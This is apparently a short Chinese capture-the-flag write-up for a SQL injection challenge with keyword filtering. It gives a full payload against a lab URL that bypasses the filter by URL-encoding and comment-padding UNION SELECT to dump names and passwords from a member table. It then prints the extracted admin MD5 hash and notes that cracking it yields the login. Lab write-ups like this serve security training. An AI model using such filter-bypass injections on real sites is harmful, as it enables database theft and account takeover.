SQL过滤字符后手工注入漏洞测试(第2题)
fuzz:一些常用字符串被禁用,所有需要想办法绕过,根据提示可以使用URL编码绕过
思路:找到注入点,对常用字符串进行URL编码
payload:
http://124.70.71.251:43425/new_list.php ?id=-1/**/%55nion/**/%53elect/**/1,2,group_concat(name,password),4/**/fro%6d/**/stormgroup_member--+
adminde3fd9cf472af81153330806963ac7a9,用户admin,密码需要md5解密,登录后有key